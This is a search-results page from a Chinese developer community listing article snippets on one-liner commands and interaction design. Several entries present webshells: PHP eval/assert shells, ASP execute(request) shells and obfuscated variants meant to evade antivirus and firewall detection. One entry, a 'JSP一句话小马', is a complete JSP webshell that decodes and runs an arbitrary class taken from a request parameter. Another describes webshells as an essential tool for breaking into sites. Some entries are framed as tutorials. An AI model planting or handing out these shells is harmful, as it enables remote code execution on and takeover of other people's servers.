- 综合排序
- 最热优先
- 最新优先
- 来自专栏老高的技术博客
一句话命令
记录一些比较简单又懒得记得命令 bash 类型 # 循环遍历下载,不下载父页面,文件已存在的话不下载 wget -r -nc -np https://yum.dockerproject.org/repo/main/centos/ # 分片20M 上传 bypy -vvv -s 20M upload # mac用代理启动单个app proxychains open -a Airy.app # mac下查看端口占用 nettop -nm tcp # brew brew uninstall zsh br
68730编辑于 2022-12-28 腾讯云ADP国内首发AI原生Widget:一句话秒级生成交互组件,重塑Agent使用体验
近日,腾讯云智能体开发平台(ADP)重磅上线国内首个“AI原生Widget”,面向企业客户提供“富交互任务交付”能力,只需自然语言描述,就能实时生成表单、按钮等交互组件。 该能力还同步在腾讯元器(一站式AI智能体创作与分发平台)生态侧落地,支持创作者一键生成交互卡片。 “AI原生Widget”是一种面向智能体任务交付的“富交互组件形态”,模型输出结构化描述(JSON Schema),平台自动渲染为可操作的表单、按钮,并将用户交互结果回传智能体,实现任务闭环执行。 自然语言秒级生成智能体交互组件在传统的大模型对话中,文本输出是主要形式。海量的文字堆砌,不仅抬高理解成本,而且完成单一任务需要多轮来回沟通,效率低且体验不佳。 从纯文本对话到富交互任务执行据悉,该功能目前在腾讯云ADP和腾讯元器上线,未来将逐步推广至QQ浏览器等更多腾讯生态应用,既为亿级终端用户优化AI交互体验,也为千行百业的智能体开发提效赋能,加速创新落地。
57810编辑于 2026-01-19- 来自专栏发现才可以探索
一句话木马
一、前言 “一句话木马”短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用,居家生活搞站越货必备神器。 本文主要总结一下常见的绕过安全检测的思路抛砖引玉,请各位大佬多讨论指教。 常规的一句话木马格式能够被轻易识别 2. 大小写混淆配合字符串关键函数strtolower 3. 字符串逆序配合大小写混淆,关键函数strtolower、strrev 4. 类似的函数还有很多,比如 parse_str、str_replace、preg_replace、create_function这一类,一句话有多种灵活的方式利用还有多种思路可以绕过检测,欢迎各位大佬讨论
2.3K00发布于 2018-09-21 - 来自专栏智能相对论
汽车AI语音交互 正在让机器交互更接近真人交互
在“以人为核心”、“更加融合”的人机交互中,语音交互(简称VUI)是核心。VUI允许更自由、高效的人机交互,其本质上比任何其他形式的用户界面都更“人性化”。 在各类应用场景中,除了智能家居,汽车产品对于语音交互的需求显而易见。不论是点击、滑动等触摸交互方式,在车载环境下都存在安全隐患且并不高效,语音交互是天然适应车载环境的交互方式。 而随着用户对汽车智能化要求的越来越高,更自然的交互成为语音交互的发展方向。如何让机器交互能够更接近真人交互?多模态融合理解、自然全双工对话、自然语义理解成为了新的需要攀登的高峰。 斑马智行的系统底层——AliOS,在传统触控、按键交互模式的基础上,将语音交互能力、视觉交互能力以及场景信息在系统层进行融合互通,更大程度得发挥了各个交互能力的优势,使得多模态融合理解、融合交互以及更自然的全双工对话 同时在各种交互能力融合后对上层应用进行开放,使得最终呈现给用户的交互更自然。 语音交互带来的产业机遇方兴未艾。
1.7K10发布于 2020-05-11 - 来自专栏全栈程序员必看
Json交互处理_stata交互项检验
Json交互处理 JSON简介 JSON(JavaScript Object Notation, JS 对象标记) 是一种轻量级的数据交换格式,目前使用特别广泛。
1.7K20编辑于 2022-11-19 Cline交互协议(1):MCP交互流程
在前一篇MCP主机使用Cline我们学会了如何使用Cline MCP,本篇我们解析下MCP详细的交互流程。 HTTP 流式 Http,将替换 SSE 场景 - 高效灵活,支持更大模块的分布式部署 上一节的MCP server的例子是基于STDIO协议的,所以本节我们来分析下STDIO协议下的完整交互流程 weather.py" ], "transportType": "stdio" } } } 配置完成后Cline就会和代理建立连接,就会在mcp_io.log里记录交互的日志
11010编辑于 2026-03-18- 来自专栏咸鱼学Python
Python | Python交互之mongoDB交互详解
前言 本篇为mongodb篇,包含实例演示,mongodb高级查询,mongodb聚合管道,python交互等内容。 mongorestore -h dbhost -d dbname --dir dbdirectory -h: 服务器地址 -d: 需要恢复的数据库实例 --dir: 备份数据所在位置 mongodb与python交互 self.cliention.delete_many({"xianyu":"xianyuplus"}) 尾言 以上就是关于mongodb的一些用法,重点部分还是mongo高级查询以及聚合管道,一定要review几遍才记得住,本篇是python数据库交互的最后一篇
9K30发布于 2019-10-09 - 来自专栏BestSDK
交互新趋势,如何设计语音交互?
一直以来,我们使用的是以视觉界面交互为主的3C产品。 值得注意的是,最近几年针对语音交互的体验设计研究开始兴起:Android 和iOS 手机开始构建自己的语音交互生态,智能汽车为了解放双手,也开始研究语音交互的玩法。 这些都证明了企业和市场对于语音交互潜在优势的的认同。语音交互开始逐渐进入到人们的日常生活当中。 当你在专注于某一件事时,最快捷的在同一时间获取其他事物相关信息的方式就是语音交互,它不会被图像交互所打扰。 ? 怎样设计语音交互体验,才能使其发挥场景化的优势?Nielsen的启发式可用性原则依然适用于语音式的交互方案。 系统状态的视觉反馈 亚马逊的语音产品Echo,是一款场景化的语音交互智能硬件。
2.7K90发布于 2018-02-27 - 来自专栏Java架构师必看
一句话木马(新)
今天说一说一句话木马(新)[通俗易懂],希望能够帮助大家进步!!! 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。 }else{ echo"上传失败"; } 写一个最简单的一句话 <?php @eval($_POST['777']) ? 0|10x05 我打ctf经常用的一句话 1:碰到过一次任意文件上穿漏洞,在config.php中并未发现定义类型Media,请求:upload/.php?
3.2K40编辑于 2022-02-10 Cline交互协议(2):LLM交互流程
在介绍完Cline和MCP server的详细交互流程后Cline交互协议(1):MCP交互流程,我们看下最重要的和LLM的交互协议。 模型的返回有很多行,由于是流式返回,每次返回的片段很小,返回了很多值,最终完成的时候会有一个结束标志 data: [DONE] 分析完简单的请求后,我们来看终极版本,请求中使用MCP server的交互流程 use_mcp_tool for 'weather'] Result:" 6,LLM返回总结后的结果 7,由于返回的格式不符合要求,Cline请求LLM按照XML格式返回结果 8,LLM返回结果内容 至此完整的交互流程介绍完毕
13410编辑于 2026-03-18- 来自专栏网络攻防实战知识交流
聊聊一句话木马
,在网站中获得种种上了木马,我们就说拿到了webshell,获得一个较低的权限,网站木马通常是入侵者入侵者拿到网站权限的标志,也是内网渗透.权限提升的开始,一般有两种网站木马,俗称小马和大马,小马又称一句话木马 > 使用lanker一句话客户端的专家模式执行相关的php语句 <?php assert($_POST[sb]);?> 变种 <?$_POST['sa']($_POST['sb']);? 限制的一句话 <script language="php">@eval($_POST[sb])</script> 利用反引号构造一句话木马 <?php echo `$_GET['r']` ? > 2.有些网上的师傅研究一句话比较厉害,这里收录 无特征隐藏PHP一句话: <? (base64_decode($_SESSION[\'theCode\']))','a'); 一句话变形 <?php ($_=@$_GET[2]).@$_($_POST[1])?
2.1K30发布于 2019-07-25 - 来自专栏wfaceboss
数据交互
页面上的所有事件都是通过js来调用的。那么就必须是 js里面写事件,然后把前台的数据,传到Controller里面,然后利用Controller来处理业务。
1.3K40发布于 2019-04-08 - 来自专栏CSS森林
交互浅解
交互浅解 由 Ghostzhang 发表于 2007-04-16 22:57 “好久没有更新blog了”发现每次一写日志,都少不了这一句。 交互设计现在也成了一个热门词,到哪都总能听到交互这交互那的,当然工作上也少不了接触到交互。每每跟臭鱼聊到交互,总会提到“以目标为导向”的交互设计——以用户的目标为设计的主导,任务越少越好。 交互所要做的就是帮你把这些任务给你安排好,让你更快的到达目地地。” 听起来好像没错,但仔细想想,你会发现任务还是要做,交互所要做的不是帮用户把任务做了,而是让用户更顺利的完成必须要完成的任务。 学交互的同学应该都知道“别让我思考——Krug可用性第一定律”、“……设计者应该尽量做到,当我看一个页面时,它应该是不言而喻,一目了然,自我解释的。
79930编辑于 2022-08-21 JSP一句话小马
<%! class NATIVE extends ClassLoader{ NATIVE(ClassLoader c){super(c);} public Class routine(byte[] b){ return super.defineClass(b, 0, b.length); } } public byte[] runtime(String str) throws Exception { Class base64; byte[] value = null; try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str }); } catch (Exception e) { try { base64=Class.forName("java.util.Base64"); Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str }); } catch (Exception ee) {} } return value; } %> <% String cls = request.getParameter("buzhidao"); if (cls != null) { new NATIVE(this.getClass().getClassLoader()).routine(runtime(cls)).newInstance().equals(new Object[]{request,response}); } %>
17510编辑于 2025-10-23- 来自专栏InvQ的专栏
一句话ListenableFuture简介
并发是一个难问题,但是通过强有力和简单的抽象,可以简化。为了使问题简化,Guava 使用了JDK 的ListenableFuture接口。 这里强烈推荐诸位使用ListenableFuture而不是Future。原因有如下三点:
1.4K20发布于 2020-09-27 - 来自专栏Tommonkey
Wellshell一句话木马
何为一句话木马?他跟其他木马有什么区别吗? 一句话木马的叫法是来自他代码结构简单,简单到什么地步?最简单的一句话木马甚至可以就一句代码就结束了,比如经典PHP一句话:<? 一句话木马类型 PHP一句话木马 jsp一句话木马 asp一句话木马 …… PHP一句话 先上一个最简单的列子: <?php @eval(_POST[‘cmd’]));?><? 免杀与绕过 为了更加隐蔽的藏在受害者主机不被杀毒软件发现,又或者是需要突破防火墙的拦截,一句话木马也需要做伪装和代码上的变形来躲过各种检测机制。 举例1: <? asp一句话 跟PHP一样先上一个最简单的asp一句话: <%eval request (“passwd”)%> 这里的变化就是开头的格式与请求方式不一样 ,这里摘选来自互联网的实列: %execute(request("passwd"))%> <%ExecuteGlobal request("passwd")%> <%Eval(Request(chr(35)))%> jsp一句话
3.2K30编辑于 2023-03-20 - 来自专栏程序员阿常
一句话需求怎么测
读者提问:一句话需求怎么测 ?阿常回答:帮产品做需求实例化1、什么是需求实例化2、为何做需求实例化3、怎么做需求实例化一、什么是需求实例化需求实例化,即用实例来说明需求。 需求只说一句话,既没有背景也没有上下文,这句话到底想传达什么意思,就不是很明确了。用实例的方式说明需求,使得产研测三方能够进行有效的交流沟通,使得大家对于本条需求要交付哪些东西能够快速达成共识。
48420编辑于 2022-06-29 - 来自专栏全栈程序员必看
关于php一句话木马
由于nginx早期的版本,至少我在用 0.9.X 的版本依旧存在漏洞,导致处理过的图片可以执行php代码 简单的说就是写好的php代码将扩展名改为图片,如 xx.jpg 文件后通过 discuz 等开源论坛的上传功能上传后可以通过 http://xxx.com/bbs/data/xxxxxxxx/xx.jpg/1.php 方式执行 xx.php里面的代码 对于discuz 论坛使用nginx的服务器可以使用rewrite方式防止代码执行
1.4K30编辑于 2022-08-31 - 来自专栏全栈程序员必看
Web安全-一句话木马
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 常见形式 常见的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);? SO,大家现在应该理解,为什么说一句话短小精悍了吧! 木马利用 以下通过DVWA的文件上传漏洞,来看看一句话木马如何使用。关于文件上传漏洞可阅读以下文章:文件上传漏洞。 中国菜刀的一句话不算,菜刀一句话通过客户端来操作也非常强大,一句话的代码可以和大马实现的一样。 这相当于一句话木马的客户端配置。
10.3K11编辑于 2022-08-25 - 来自专栏信安之路
一句话开启HTTP服务
下面我们就简单介绍下,在不同环境下使用一句话启动HTTP服务的各种姿势。 Python 对于不同的python版本有不同的方式,下面就一一介绍。 -9 pid的方式干掉进程 Perl perl中有几个库可以完成这个功能,如下: Perl (HTTP::Server::Brick) 安装必要库: cpan HTTP::Server::Brick 一句话启动服务 :Brick->new(port=>8000); $s->mount("/"=>{path=>"."}); $s->start' Perl (IO::All) 安装必要库: cpan IO::All 一句话启动服务 "./$1 |" : $1) if /^GET \/(.*) / })' Perl (Mojolicious) 安装必要库: cpan Mojolicious::Lite 一句话启动服务: perl - Lite -MCwd -e 'app->static->paths->[0]=getcwd; app->start' daemon -l http://*:8000 PHP php版本需要大于 5.4才能一句话实现这个功能
1.9K00发布于 2018-08-08
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号